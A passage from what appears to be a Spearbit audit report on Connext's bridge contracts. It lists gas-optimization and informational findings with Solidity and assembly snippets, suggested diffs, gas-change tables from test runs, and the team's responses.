    test_Connext__bridgeFastLocalShouldWork() (gas: -5038 (-0.457%))
    test_BridgeFacet__xcall_localTokenTransferWorksWhenNotAdopted() (gas: -5039 (-0.458%))
    test_BridgeFacet__xcall_worksWithoutValue() (gas: -5038 (-0.470%))
    test_Connext__zeroValueTransferWithEmptyAssetShouldWork() (gas: -5037 (-0.569%))
    test_Connext__bridgeSlowLocalShouldWork() (gas: -5038 (-0.583%))
    test_Connext__zeroValueTransferShouldWork() (gas: -5038 (-0.603%))
    test_BridgeFacet__xcall_worksIfPreexistingRelayerFee() (gas: -5038 (-1.688%))
    test_BridgeFacet__xcall_localTokenTransferWorksWithoutAdopted() (gas: -5038 (-1.696%))
    test_BridgeFacet__xcall_zeroRelayerFeeWorks() (gas: -4031 (-1.722%))
    test_BridgeFacet__xcall_canonicalTokenTransferWorks() (gas: -5038 (-1.857%))
    test_LibDiamond__initializeDiamondCut_withZeroAcceptanceDelay_works() (gas: -576237 (-2.224%))
    test_BridgeFacet__xcall_zeroValueEmptyAssetWorks() (gas: -5037 (-3.209%))
    Overall gas change: -670287 (-18.077%)
Connext: Solved in PR 2512.
Spearbit: Verified.
+5.4.27 s.aavePool can be cached to save gas in _backLoan
Severity: Gas Optimization
Context: PortalFacet.sol#L179-L184
Description: s.aavePool can be cached to save gas by reading it from storage only once.
Recommendation: Cache s.aavePool to save some gas:
    address aPool = s.aavePool;
    // increase allowance
    SafeERC20Upgradeable.safeApprove(IERC20Upgradeable(_asset), aPool, 0);
    SafeERC20Upgradeable.safeIncreaseAllowance(IERC20Upgradeable(_asset), aPool, _backing + _fee);
    // back loan
    IAavePool(aPool).backUnbacked(_asset, _backing, _fee);
Gas saved according to test cases:
    test_LibDiamond__initializeDiamondCut_withZeroAcceptanceDelay_works() (gas: -5610 (-0.022%))
    test_PortalFacet__repayAavePortal_shouldWorkUsingSwap() (gas: -250 (-0.023%))
    test_PortalFacet__repayAavePortalFor_shouldWork() (gas: -250 (-0.024%))
    test_PortalFacet__repayAavePortal_works() (gas: -250 (-0.147%))
    Overall gas change: -6360 (-0.215%)
Connext: Fixed in PR 2513.
Spearbit: Verified.
+5.4.28 <= or >= when comparing a constant can be converted to < or > to save gas
Severity: Gas Optimization
Context: General
Description: In this context, we are doing the following comparison:
    X <= C // or X >= C
where X is a variable and C is a constant expression. But since the right-hand side of <= (or >=) is the constant expression C, we can convert <= into < (or >= into >) to avoid extra opcodes/bytecode being produced by the compiler.
Recommendation: To turn <= into <, we just need to increment C by 1 and use C+1 on the right-hand side instead (if C is type(uint256).max, the comparison can be replaced by true):
    X < (C+1)
In the case of >=, we need to decrement (when C is not 0; when C is 0, the comparison can be replaced by true for unsigned values):
    X > (C-1)
We can either calculate C+1 (or C-1) and use it in our comparison, or let the compiler inline this value.
Connext: Solved in PR 2514.
Spearbit: Verified.
+5.4.29 Use memory's scratch space to calculateCanonicalHash
Severity: Gas Optimization
Context:
• AssetLogic.sol#L500-L502
• ArbitrumHubConnector.sol#L167
Description: calculateCanonicalHash uses abi.encode to prepare a memory chunk to calculate and return a hash value. Since only 2 words of memory are required to calculate the hash, we can utilize the memory's scratch space [0x00, 0x40) for this purpose. Using this approach would avoid paying memory expansion costs, among other things.
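For reference, the unoptimized pattern is roughly equivalent to the following (a minimal sketch of the abi.encode-based variant; the actual function lives in AssetLogic.sol):
    function calculateCanonicalHash(bytes32 _id, uint32 _domain) internal pure returns (bytes32) {
        // abi.encode pads _domain to a full 32-byte word, so 64 bytes of fresh memory
        // are allocated at the free memory pointer before hashing.
        return keccak256(abi.encode(_id, _domain));
    }
Since abi.encode(_id, _domain) is exactly two 32-byte words, hashing the same two words from scratch space (as in the recommendation below) yields the same digest without allocating new memory.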
Recommendation: calculateCanonicalHash can be changed to:
    function calculateCanonicalHash(bytes32 _id, uint32 _domain) internal pure returns (bytes32 cHash) {
        assembly {
            mstore(0, _id)
            mstore(0x20, _domain)
            cHash := keccak256(0, 0x40)
        }
    }
Gas diff according to test cases:
    test_BridgeFacet__execute_worksWithAdopted() (gas: -140 (-0.012%))
    test_BridgeFacet__execute_worksWithNegativeSlippage() (gas: -140 (-0.012%))
    test_BridgeFacet__execute_worksWithPositiveSlippage() (gas: -140 (-0.012%))
    test_BridgeFacet__execute_respectsSlippageOverrides() (gas: -140 (-0.012%))
    test_BridgeFacet__xcall_worksWithPositiveSlippage() (gas: -139 (-0.012%))
    test_BridgeFacet__xcall_adoptedTransferWorks() (gas: -139 (-0.012%))
    test_BridgeFacet__xcallIntoLocal_works() (gas: -139 (-0.012%))
    test_BridgeFacet__xcall_localTokenTransferWorksWithAdopted() (gas: -139 (-0.012%))
    test_BridgeFacet__execute_receiveLocalWorks() (gas: -139 (-0.012%))
    test_PortalFacet__repayAavePortal_failsIfRepayTooMuch() (gas: -139 (-0.013%))
    test_PortalFacet__repayAavePortal_shouldWorkUsingSwap() (gas: -140 (-0.013%))
    test_BridgeFacet__xcall_localTokenTransferWorksWhenNotAdopted() (gas: -140 (-0.013%))
    test_BridgeFacet__xcall_worksWithoutValue() (gas: -139 (-0.013%))
    test_PortalFacet__repayAavePortalFor_shouldWork() (gas: -139 (-0.013%))
    test_BridgeFacet__xcall_failIfAssetNotSupported() (gas: -139 (-0.014%))
    test_PortalFacet__repayAavePortal_failsIfSwapFailed() (gas: -140 (-0.014%))
    test_PortalFacet__repayAavePortalFor_failsIfZeroTotalAmount() (gas: -139 (-0.015%))
    test_Connext__bridgeFastAdoptedShouldWork() (gas: -831 (-0.017%))
    test_Connext__bridgeFastOriginLocalToDestinationAdoptedShouldWork() (gas: -971 (-0.020%))
    test_BridgeFacet__execute_multipath() (gas: -139 (-0.025%))
    test_BridgeFacet__execute_failIfAnyRouterHasInsufficientFunds() (gas: -129 (-0.031%))
    test_BridgeFacet__execute_worksOnCanonical() (gas: -139 (-0.035%))
    test_BridgeFacet__execute_worksWithAave() (gas: -140 (-0.036%))
    test_BridgeFacet__execute_successfulCalldata() (gas: -140 (-0.039%))
    test_BridgeFacet__execute_worksWithDelegateAsSender() (gas: -139 (-0.041%))
    test_BridgeFacet__execute_worksWithLocalAsAdopted() (gas: -139 (-0.041%))
    test_BridgeFacet__execute_calldataFailsLoudlyOnFast() (gas: -139 (-0.043%))
    test_BridgeFacet__execute_worksWithUnapprovedIfNoWhitelist() (gas: -139 (-0.044%))
    test_BridgeFacet__execute_noCalldataWorks() (gas: -139 (-0.044%))
    test_BridgeFacet__execute_worksWithEmptyCanonicalIfZeroValue() (gas: -140 (-0.045%))
    test_BridgeFacet__xcall_worksIfPreexistingRelayerFee() (gas: -139 (-0.047%))
    test_BridgeFacet__xcall_localTokenTransferWorksWithoutAdopted() (gas: -139 (-0.047%))
    test_BridgeFacet__xcall_zeroRelayerFeeWorks() (gas: -112 (-0.048%))
    test_BridgeFacet__execute_handleAlreadyReconciled() (gas: -139 (-0.051%))
    test_BridgeFacet__xcall_canonicalTokenTransferWorks() (gas: -139 (-0.051%))
    test_BridgeFacet__execute_calldataFailureHandledOnSlow() (gas: -139 (-0.052%))
    test_InboxFacet__reconcile_fastLiquidityMultipathWorks() (gas: -279 (-0.054%))
    test_BridgeFacet__execute_worksWith0Value() (gas: -140 (-0.054%))
    test_BridgeFacet__execute_failIfRouterHasInsufficientFunds() (gas: -129 (-0.055%))
    test_Connext__permissionedCallsWork() (gas: -692 (-0.060%))
    test_BridgeFacet__xcall_failIfCapReachedOnCanoncal() (gas: -138 (-0.060%))
    test_Connext__unpermissionedCallsWork() (gas: -833 (-0.062%))
    test_BridgeFacet__execute_failsIfRouterNotApprovedForPortal() (gas: -129 (-0.062%))
    test_BridgeFacet__execute_failsIfNoLiquidityAndAaveNotEnabled() (gas: -129 (-0.072%))
    test_RoutersFacet__addLiquidityForRouter_failsIfHitsCap() (gas: -138 (-0.072%))
    test_InboxFacet__reconcile_fastLiquiditySingleRouterWorks() (gas: -279 (-0.074%))
    test_Connext__zeroValueTransferWithEmptyAssetShouldWork() (gas: -693 (-0.078%))
    test_Connext__bridgeSlowLocalShouldWork() (gas: -692 (-0.080%))
    test_PortalFacet__repayAavePortal_works() (gas: -140 (-0.082%))
    test_InboxFacet__reconcile_failsIfPortalAndNoRouter() (gas: -279 (-0.083%))
    test_Connext__zeroValueTransferShouldWork() (gas: -693 (-0.083%))
    test_RoutersFacet__addLiquidity_routerIsSender() (gas: -139 (-0.087%))
    test_RoutersFacet__addLiquidityForRouter_worksForToken() (gas: -139 (-0.087%))
    test_Connext__bridgeFastLocalShouldWork() (gas: -971 (-0.088%))
    test_InboxFacet__reconcile_worksPreExecute() (gas: -279 (-0.091%))
    test_InboxFacet__reconcile_worksWithLocal() (gas: -279 (-0.091%))
    test_InboxFacet__reconcile_failIfCompleted() (gas: -279 (-0.096%))
    test_InboxFacet__reconcile_failIfReconciled() (gas: -279 (-0.096%))
    test_RoutersFacet__removeRouterLiquidity_worksWithRecipientSet() (gas: -138 (-0.102%))
    test_InboxFacet__reconcile_worksWithCanonical() (gas: -279 (-0.113%))
    test_RoutersFacet__removeRouterLiquidityFor_works() (gas: -138 (-0.121%))
    test_RoutersFacet__removeRouterLiquidity_worksWithToken() (gas: -138 (-0.122%))
    test_BridgeFacet__xcall_failInsufficientErc20Tokens() (gas: -139 (-0.123%))
    test_BridgeFacet__xcall_failInsufficientErc20Approval() (gas: -138 (-0.125%))
    test_PortalFacet__repayAavePortal_failsIfInsufficientAmount() (gas: -139 (-0.160%))
    test_LibDiamond__initializeDiamondCut_withZeroAcceptanceDelay_works() (gas: -49695 (-0.192%))
    test_RoutersFacet__addLiquidityForRouter_failsIfAssetUnapproved() (gas: -138 (-0.199%))
    test_AssetLogic__swapToLocalAssetIfNeeded_worksWithAdopted() (gas: -166 (-0.270%))
    test_RoutersFacet__addLiquidityForRouter_failsIfRouterUnapproved() (gas: -138 (-0.279%))
    test_RoutersFacet__removeRouterLiquidity_failsIfNotEnoughFunds() (gas: -138 (-0.299%))
    test_TokenFacet__addStableSwapPool_canDelete() (gas: -138 (-0.313%))
    test_TokenFacet__addStableSwapPool_success() (gas: -138 (-0.332%))
    test_AssetLogic__swapToLocalAssetIfNeeded_worksWithLocal() (gas: -156 (-1.021%))
    test_AssetLogic__swapToLocalAssetIfNeeded_worksIfZero() (gas: -156 (-1.022%))
    Overall gas change: -66221 (-7.431%)
Reference: View the opcode diff between the 2 different implementations here: godbolt.org
Note: We need to make sure that uint32 _domain does not have dirty bytes when passed to this function; otherwise, those bytes can change the outcome of the calculated hash. The same recommendation also applies to ArbitrumHubConnector._confirmHash.
Connext: Given the increased risk of generating incorrect canonical hashes if this function is used incorrectly in future upgrades, we've chosen not to implement this suggestion.
Spearbit: Acknowledged.
+5.4.30 isLocalOrigin can be optimized by using a named return parameter
Severity: Gas Optimization
Context: AssetLogic.sol#L419-L446
Description: isLocalOrigin, after getting the code size of _token, returns a comparison result as a bool:
    assembly {
        _codeSize := extcodesize(_token)
    }
    return _codeSize != 0;
This last comparison can be avoided if we use a named return variable, since the cast to the bool type automatically does the check for us. Currently, the check/comparison is performed twice under the hood. Note: also see issue "Use contract.code.length".
Recommendation: In practice, if we had used _token.code.length != 0 as the return value and omitted the assembly block, it would be 6 gas more expensive, since the compiler (tested with 0.8.13) cleans the _token address before getting the code length:
    PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
    AND
    EXTCODESIZE
    ISZERO
    ISZERO
whereas the original implementation would turn out to be:
    EXTCODESIZE
    ISZERO
    ISZERO
We can actually shave off 6 gas from the original implementation by changing it to:
    function isLocalOrigin(address _token, AppStorage storage s) internal view returns (bool result) {
        // If the token contract WAS deployed by the bridge, it will be stored in this mapping.
        // If so, the token is NOT of local origin.
        if (s.representationToCanonical[_token].domain != 0) {
            return false;
        }
        // If the contract was NOT deployed by the bridge, but the contract does exist, then it
        // IS of local origin. Returns true if code exists at `_addr`.
        // solhint-disable-next-line no-inline-assembly
        assembly {
            result := extcodesize(_token)
        }
    }
in which the part we care about compiles to:
    EXTCODESIZE
Gas saved according to test cases if we go with this suggestion:
    test_InboxFacet__reconcile_worksWithCanonical() (gas: -6 (-0.002%))
    test_LibDiamond__initializeDiamondCut_withZeroAcceptanceDelay_works() (gas: -1600 (-0.006%))
    Overall gas change: -1606 (-0.009%)
For reference: godbolt.org
Connext: Following the recommendation provided in the "Use contract.code.length" issue for readability in PR 2486.
Spearbit: Acknowledged.
+5.4.31 The branching decision in AmplificationUtils._getAPrecise can be removed
Severity: Gas Optimization
Context:
• AmplificationUtils.sol#L49-L66
• SwapUtilsExternal.sol#L152-L169
Description: _getAPrecise uses an if/else block to compare a1 to a0. This comparison is unnecessary if we use a simpler formula to return the interpolated value of a.
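In plain (checked) Solidity, the branchless interpolation would read as follows (a sketch for intuition only; the assembly variant in the recommendation below implements the same formula):
    // Linear interpolation between a0 (the value at time t0) and a1 (the value at time t1),
    // valid while t0 <= block.timestamp < t1:
    //   a(t) = (a0 * (t1 - t) + a1 * (t - t0)) / (t1 - t0)
    uint256 t = block.timestamp;
    currentA = (a0 * (t1 - t) + currentA * (t - t0)) / (t1 - t0); // currentA holds a1 at this point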
Recommendation: We can gas optimize and simplify the code like the following:
    /**
     * @notice Return A in its raw precision
     * @dev See the StableSwap paper for details
     * @param self Swap struct to read from
     * @return currentA A parameter in its raw precision form
     */
    function _getAPrecise(SwapUtils.Swap storage self) internal view returns (uint256 currentA) {
        uint256 t1 = self.futureATime; // time when ramp is finished
        currentA = self.futureA; // final A value when ramp is finished
        if (block.timestamp < t1) {
            uint256 t0 = self.initialATime; // time when ramp is started
            uint256 a0 = self.initialA; // initial A value when ramp is started
            assembly {
                currentA := div(
                    add(
                        mul(a0, sub(t1, timestamp())),
                        mul(currentA, sub(timestamp(), t0))
                    ),
                    sub(t1, t0)
                )
            }
        }
    }
Gas savings according to test files:
    test_Connext__bridgeFastOriginLocalToDestinationAdoptedShouldWork() (gas: -48 (-0.001%))
    test_Connext__bridgeFastAdoptedShouldWork() (gas: -64 (-0.001%))
    test_StableSwapFacet__removeSwapLiquidityImbalance_failIfPaused() (gas: -8 (-0.003%))
    test_StableSwapFacet__removeSwapLiquidity_shouldWork() (gas: -8 (-0.003%))
    test_StableSwapFacet__removeSwapLiquidityOneToken_failIfMoreThanLpBalance() (gas: -8 (-0.004%))
    test_StableSwapFacet__removeSwapLiquidityImbalance_failIfMoreThanLpBalance() (gas: -16 (-0.007%))
    test_SwapAdminFacet__withdrawSwapAdminFess_shouldWorkWithExpectedAmount() (gas: -16 (-0.007%))
    test_StableSwapFacet__addSwapLiquidity_shouldWork() (gas: -16 (-0.008%))
    test_StableSwapFacet__removeSwapLiquidityOneToken_failIfFrontRun() (gas: -32 (-0.008%))
    test_StableSwapFacet__removeSwapLiquidityImbalance_shouldWork() (gas: -24 (-0.008%))
    test_StableSwapFacet__removeSwapLiquidityImbalance_failIfFrontRun() (gas: -32 (-0.008%))
    test_StableSwapFacet__removeSwapLiquidityOneToken_shouldWork() (gas: -24 (-0.009%))
    test_StableSwapFacet__swapExact_shouldWork() (gas: -16 (-0.011%))
    test_StableSwapFacet__swap_shouldWork() (gas: -16 (-0.012%))
    test_StableSwapFacet__swapExact_failIfNotMinDy() (gas: -24 (-0.013%))
    test_StableSwapFacet__swap_failIfNotMinDy() (gas: -24 (-0.014%))
    test_StableSwapFacet__removeSwapLiquidityImbalance_failIfNotMatchPoolTokens() (gas: -8 (-0.015%))
    test_StableSwapFacet__calculateRemoveSwapLiquidityOneToken_shouldWork() (gas: -16 (-0.020%))
    test_StableSwapFacet__calculateSwap_shouldWork() (gas: -16 (-0.027%))
    test_AmplificationUtils__rampA_works() (gas: -8 (-0.032%))
    test_StableSwapFacet__calculateSwapTokenAmount_shouldWork() (gas: -16 (-0.032%))
    test_StableSwapFacet__getSwapVirtualPrice_shouldWork() (gas: -16 (-0.036%))
    test_AmplificationUtils__rampA_revertIfFuturePriceTooLarge() (gas: -8 (-0.073%))
    test_AmplificationUtils__rampA_revertIfFuturePriceTooSmall() (gas: -8 (-0.074%))
    test_StableSwapFacet__getSwapAPrecise() (gas: -16 (-0.150%))
    test_StableSwapFacet__getSwapA_shouldWork() (gas: -16 (-0.150%))
    test_SwapAdminFacet__stopRampA_shouldWork() (gas: -405 (-0.266%))
    test_LibDiamond__initializeDiamondCut_withZeroAcceptanceDelay_works() (gas: -107793 (-0.416%))
    test_SwapAdminFacet__rampA_shouldWorkWithDownwards() (gas: -2410 (-0.904%))
    test_SwapAdminFacet__rampA_shouldWorkWithUpwards() (gas: -2422 (-0.908%))
    test_AmplificationUtils__stopRampA_works() (gas: -397 (-1.459%))
    test_AmplificationUtils__getA_works() (gas: -397 (-3.239%))
    test_AmplificationUtils__getAPrecise_works() (gas: -397 (-3.255%))
    test_AmplificationUtils___getAPrecise_works() (gas: -800 (-5.366%))
    Overall gas change: -115525 (-16.537%)
Note: one of the original tests, test_SwapAdminFacet__rampA_shouldWorkWithDownwards, actually fails. This is due to rounding errors and how that rounding error is handled by the more concise formula versus the original implementation using branched if/else blocks (a0 vs a1). The original implementation would return 4794 for this.getSwapAPrecise(_canonicalKey) versus the new solution, which returns 4793; the actual value to a few decimal points is 4793.32027668628.
A few assumptions would need to be checked:
• block.timestamp is always greater than or equal to t0. This is true when rampA or stopRampA is used. We also need to check the initialization t0 = initialATime and any other potential place that might set that value; the invariant block.timestamp >= t0 would need to be checked, because in the assembly block the subtraction would not revert in case of an underflow. This would basically guarantee that t ∈ [t0, t1) inside the outer if block.
• We need to check, given the ranges of a0, a1, t0, t1 and block.timestamp, that the numerator in our new concise formula would not overflow (t is block.timestamp):
    (a0 * (t1 - t) + a1 * (t - t0)) / (t1 - t0)
Note: we can also check whether a0 == a1 to return early; it would add gas overhead for cases where they are not equal.
Connext: Solved by PR 2355.
Spearbit: Verified.
+5.4.32 Optimize increment in insert()
Severity: Gas Optimization
Context: Merkle.sol#L76-L81
Description: The increment of tree.count in the function insert() can be optimized.
    function insert(Tree storage tree, bytes32 node) internal returns (uint256) {
        uint256 size = tree.count + 1;
        ...
        tree.count = size;
        ...
    }
Recommendation: Consider changing the code to:
      function insert(Tree storage tree, bytes32 node) internal returns (uint256) {
    -     uint256 size = tree.count + 1;
    +     uint256 size = ++tree.count;
          ...
    -     tree.count = size;
          ...
      }
Connext: Solved in PR 2211.
Spearbit: Verified.
+5.4.33 Optimize calculation in loop of dequeueVerified
Severity: Gas Optimization
Context: Queue.sol#L59-L102
Description: The function dequeueVerified() can be optimized in the following way: (block.number - commitBlock >= delay) is the same as (block.number - delay >= commitBlock), and block.number - delay is constant within the loop, so it can be calculated outside of it. Also, (x >= y) can be replaced by (!(x < y)) or (!(y > x)) to save some gas.
    function dequeueVerified(Queue storage queue, uint256 delay) internal returns (bytes32[] memory) {
        ...
        for (last; last >= first; ) {
            uint256 commitBlock = queue.commitBlock[last];
            if (block.number - commitBlock >= delay) {
                ...
            }
        }
    }
Recommendation: Consider changing the code to:
      function dequeueVerified(Queue storage queue, uint256 delay) internal returns (bytes32[] memory) {
          ...
    +     uint256 highestAcceptableCommitBlock = block.number - delay;
          for (last; last >= first; ) {
              uint256 commitBlock = queue.commitBlock[last];
    -         if (block.number - commitBlock >= delay) {
    +         if (!(commitBlock > highestAcceptableCommitBlock)) {
                  ...
              }
          }
      }
Connext: Solved in PR 2228.
Spearbit: Verified.
+5.4.34 Cache array length for loops
Severity: Gas Optimization
Context: Diamond.sol#L35, Multicall.sol#L16, StableSwap.sol#L90, SwapAdminFacet.sol#L109-L177, LibDiamond.sol#L116, LibDiamond.sol#L141, LibDiamond.sol#L159, LibDiamond.sol#L174, SwapUtils.sol#L216, SwapUtilsExternal.sol#L253, SpokeConnector.sol#L354, SpokeConnector.sol#L370, BytesUtils.sol#L108, BytesUtils.sol#L119, MerkleTrie.sol#L140, MerkleTrie.sol#L227, Merkle.sol#L20, Merkle.sol#L113, MerklePatriciaProof.sol#L36, MerklePatriciaProof.sol#L99, MerklePatriciaProof.sol#L128, TypedMemView.sol#L813
Description: Fetching the array length on each iteration generally consumes more gas compared to caching it in a variable.
Recommendation: All the highlighted code above can be made gas-efficient by caching the array length. For instance:
    -for (uint256 i; i < xp.length; ) {
    +uint256 len = xp.length;
    +for (uint256 i; i < len; ) {
Connext: Solved in PR 2434.
Spearbit: Verified.
+5.4.35 Use custom errors instead of encoding the error message
Severity: Gas Optimization
Context: TypedMemView.sol#L287-L290, TypedMemView.sol#L145, Encoding.sol#L35
Description: TypedMemView.sol replicates the functionality provided by custom errors with arguments:
    (, uint256 g) = encodeHex(uint256(typeOf(memView)));
    (, uint256 e) = encodeHex(uint256(_expected));
    string memory err = string(
        abi.encodePacked("Type assertion failed. Got 0x", uint80(g), ". Expected 0x", uint80(e))
    );
    revert(err);
encodeHex() is only used to encode a variable for an error message.
Recommendation:
• Use custom errors instead of encoding variables in the revert string.
• Remove the encodeHex() functions in favour of custom errors.
Connext: Solved in PR 2507.
Spearbit: Verified.
+5.4.36 Avoid OR with a zero variable
Severity: Gas Optimization
Context: TypedMemView.sol#L306, TypedMemView.sol#L328, TypedMemView.sol#L132
Description: A bitwise OR operation with a zero-valued variable is a no-op. The highlighted code above performs OR operations with a zero variable, which can be avoided:
    newView := or(newView, shr(40, shl(40, memView)))
    ...
    newView := shl(96, or(newView, _type)) // insert type
    ...
    _encoded |= _nibbleHex(_byte >> 4); // top 4 bits
Recommendation: Apply this diff:
    - newView := or(newView, shr(40, shl(40, memView)))
    + newView := shr(40, shl(40, memView))
    ...
    - newView := shl(96, or(newView, _type)) // insert type
    + newView := shl(96, _type) // insert type
    ...
    - _encoded |= _nibbleHex(_byte >> 4); // top 4 bits
    + _encoded = _nibbleHex(_byte >> 4); // top 4 bits
Connext: Solved in PR 2506.
Spearbit: Verified.
+5.4.37 Use scratch space instead of free memory
Severity: Gas Optimization
Context: TypedMemView.sol#L651, TypedMemView.sol#L667, TypedMemView.sol#L684
Description: Memory slots 0x00 and 0x20 are scratch space, so any operation in assembly that needs at most 64 bytes of memory to write temporary data can use scratch space. The functions sha2(), hash160() and hash256() use free memory to write the intermediate hash values. The scratch space can be used here, since these values fit in 32 bytes. It saves the gas spent on reading the free memory pointer, and on memory expansion.
Recommendation: Consider applying this diff, which replaces the use of free memory with scratch space:
      function sha2(bytes29 memView) internal view returns (bytes32 digest) {
          ...
          assembly {
    -         let ptr := mload(0x40)
    -         pop(staticcall(gas(), 2, _loc, _len, ptr, 0x20)) // sha2
    +         pop(staticcall(gas(), 2, _loc, _len, 0x00, 0x20)) // sha2
    -         digest := mload(ptr)
    +         digest := mload(0x00)
          }
      }
      ...
      function hash160(bytes29 memView) internal view returns (bytes20 digest) {
          ...
          assembly {
    -         let ptr := mload(0x40)
    -         pop(staticcall(gas(), 2, _loc, _len, ptr, 0x20)) // sha2
    +         pop(staticcall(gas(), 2, _loc, _len, 0x00, 0x20)) // sha2
    -         pop(staticcall(gas(), 3, ptr, 0x20, ptr, 0x20)) // rmd160
    +         pop(staticcall(gas(), 3, 0x00, 0x20, 0x00, 0x20)) // rmd160
    -         digest := mload(add(ptr, 0xc)) // return value is 0-prefixed.
    +         digest := mload(0xc) // return value is 0-prefixed.
          }
      }
      ...
      function hash256(bytes29 memView) internal view returns (bytes32 digest) {
          ...
          assembly {
    -         let ptr := mload(0x40)
    -         pop(staticcall(gas(), 2, _loc, _len, ptr, 0x20)) // sha2
    +         pop(staticcall(gas(), 2, _loc, _len, 0x00, 0x20)) // sha2
    -         pop(staticcall(gas(), 2, ptr, 0x20, ptr, 0x20)) // sha2
    +         pop(staticcall(gas(), 2, 0x00, 0x20, 0x00, 0x20)) // sha2
    -         digest := mload(ptr)
    +         digest := mload(0x00)
          }
      }
Connext: Removed the above functions in PR 2474.
Spearbit: Verified.
+5.4.38 Redundant checks in _processMessageFromRoot() of PolygonSpokeConnector
Severity: Gas Optimization
Context: PolygonSpokeConnector.sol#L61-L74, PolygonSpokeConnector.sol#L78-L82, FxBaseChildTunnel.sol#L32-L41
Description: The function _processMessageFromRoot() of PolygonSpokeConnector does two checks on sender, which are the same:
• validateSender(sender) checks sender == fxRootTunnel.
• _setMirrorConnector() and setFxRootTunnel() set fxRootTunnel = _mirrorConnector and mirrorConnector = _mirrorConnector.
• require(sender == mirrorConnector, ...) checks sender == mirrorConnector, which is the same as sender == fxRootTunnel.
Note: the require in _setMirrorConnector() makes sure the values can't be updated later on. So one of the checks in the function _processMessageFromRoot() could be removed to save some gas and to make the code easier to understand.
    contract PolygonSpokeConnector is SpokeConnector, FxBaseChildTunnel {
        function _processMessageFromRoot(..., address sender, ...) ... validateSender(sender) {
            ...
            require(sender == mirrorConnector, "!sender");
            ...
        }
        function _setMirrorConnector(address _mirrorConnector) internal override {
            require(fxRootTunnel == address(0x0), ...);
            setFxRootTunnel(_mirrorConnector);
        }
    }
    abstract contract FxBaseChildTunnel is IFxMessageProcessor {
        function setFxRootTunnel(address _fxRootTunnel) public virtual {
            ...
            fxRootTunnel = _fxRootTunnel; // == _mirrorConnector
        }
        modifier validateSender(address sender) {
            require(sender == fxRootTunnel, ...);
            _;
        }
    }
Recommendation: Remove one of the redundant checks in _processMessageFromRoot().
Connext: Solved in PR 2521.
Spearbit: Verified.
+5.4.39 Consider using bitmaps in _recordOutputAsSpent() of ArbitrumHubConnector
Severity: Gas Optimization
Context: ArbitrumHubConnector.sol#L171-L196, Outbox.sol#L219-L235
Description: The function _recordOutputAsSpent() stores status via a mapping of booleans. However, the equivalent function recordOutputAsSpent() of Arbitrum Nitro uses a mapping of bitmaps to store the status, which saves gas. Note: this saving is possible because the index values are neatly ordered.
    function _recordOutputAsSpent(..., uint256 _index, ...) ... {
        ...
        require(!processed[_index], "spent");
        ...
        processed[_index] = true;
    }
Arbitrum version:
    function recordOutputAsSpent(..., uint256 index, ...) ... {
        ...
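        // Nitro packs 256 "spent" flags into each storage slot; the index is split into a (slot, bit) pair below.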
        (uint256 spentIndex, uint256 bitOffset, bytes32 replay) = _calcSpentIndexOffset(index);
        if (_isSpent(bitOffset, replay)) revert AlreadySpent(index);
        spent[spentIndex] = (replay | bytes32(1 << bitOffset));
    }
Recommendation: Consider using bitmaps in _recordOutputAsSpent().
Connext: Acknowledged.
Spearbit: Acknowledged.
+5.4.40 Move nonReentrant from process() to proveAndProcess()
Severity: Gas Optimization
Context: SpokeConnector.sol#L330-L376, SpokeConnector.sol#L492-L553
Description: The function process() has a nonReentrant modifier. The function process() is also internal and is only called from proveAndProcess(), so it is also possible to move the nonReentrant modifier to the function proveAndProcess(). This would save repeatedly setting and unsetting the status of nonReentrant, which saves gas.
    function proveAndProcess(...) ... {
        ...
        for (uint32 i = 0; i < _proofs.length; ) {
            process(_proofs[i].message);
            unchecked {
                ++i;
            }
        }
    }
    function process(bytes memory _message) internal nonReentrant returns (bool _success) {
        ...
    }
Recommendation: Consider moving the nonReentrant modifier from process() to proveAndProcess(). Note: if in the future a separation between prove() and process() is made, then the location of the nonReentrant modifier will have to be reconsidered.
Connext: Solved in PR 2516.
Spearbit: Verified.
5.5 Informational
+5.5.1 OpenZeppelin libraries IERC20Permit and EIP712 are final
Severity: Informational
Context: OZERC20.sol#L10-L11, draft-IERC20Permit.sol#L5-L7, draft-EIP712.sol#L5-L7
Description: The OpenZeppelin libraries have changed IERC20Permit and EIP712 to a final version, so the final versions can be used.
OZERC20.sol
    import "@openzeppelin/contracts/token/ERC20/extensions/draft-IERC20Permit.sol";
    import {EIP712} from "@openzeppelin/contracts/utils/cryptography/draft-EIP712.sol";
draft-IERC20Permit.sol
    // EIP-2612 is Final as of 2022-11-01. This file is deprecated.
    import "./IERC20Permit.sol";
draft-EIP712.sol
    // EIP-712 is Final as of 2022-08-11. This file is deprecated.
    import "./EIP712.sol";
Recommendation: Consider changing the imports in OZERC20 to:
    - import "@openzeppelin/contracts/token/ERC20/extensions/draft-IERC20Permit.sol";
    + import "@openzeppelin/contracts/token/ERC20/extensions/IERC20Permit.sol";
    - import {EIP712} from "@openzeppelin/contracts/utils/cryptography/draft-EIP712.sol";
    + import {EIP712} from "@openzeppelin/contracts/utils/cryptography/EIP712.sol";
Connext: OZ latest release is 4.8.0 and it doesn't include ERC20Permit.sol. Changes to EIP712.sol in PR 2350.
Spearbit: Verified.
+5.5.2 Use Foundry's multi-chain tests
Severity: Informational
Context: nxtp contracts
Description: Foundry supports multi-chain testing that can be useful to catch bugs earlier in the development process. Since Connectors are a critical part of the NXTP protocol, a local multi-chain environment can be used to test many scenarios not possible on test chains or in production.
Recommendation: Consider integrating Foundry's multi-chain testing. See the MakerDAO PR for inspiration.
Connext: Testing framework is still a bit mixed, and would require more offchain changes. Ideally, a complete migration to a single framework will happen in the future.
Spearbit: Acknowledged.
+5.5.3 Risk of chain split
Severity: Informational
Context: Connector.sol#L37, LibConnextStorage.sol#L145
Description: Domains are considered immutable (unless implementation contracts are redeployed). In case of chain splits, both forks will continue having the same domain, and the recipients won't be able to differentiate the source chain of the message.
Recommendation: There are different ways to address this (assuming that the forks have different chain IDs):
• When a chain split is observed off-chain, delete all the facets on the chain you don't want to support.
• When a chain split is observed off-chain, remove all connectors on the chain you don't want to support through DomainIndex.removeDomain().
• Instead of supplying domain information on deployment, consider the chain ID for EVM-compatible chains. Note that non-EVM chains need to be handled separately.
In the case both forks use the same chain ID, there will generally be a risk of transaction/signature replay. However, it's highly likely one of them won't be economically successful (like in the case of the short-lived merge split). In general, it will be good to warn users during these times.
Connext: Acknowledge this is a problem, but using the block.chainId is not a valid identifier in non-EVM chains. Having an inconsistent identifier structure across domains seems like adding unnecessary complexity.
Spearbit: Acknowledged.
+5.5.4 Use zkSync's custom compiler for compiling and (integration) testing
Severity: Informational
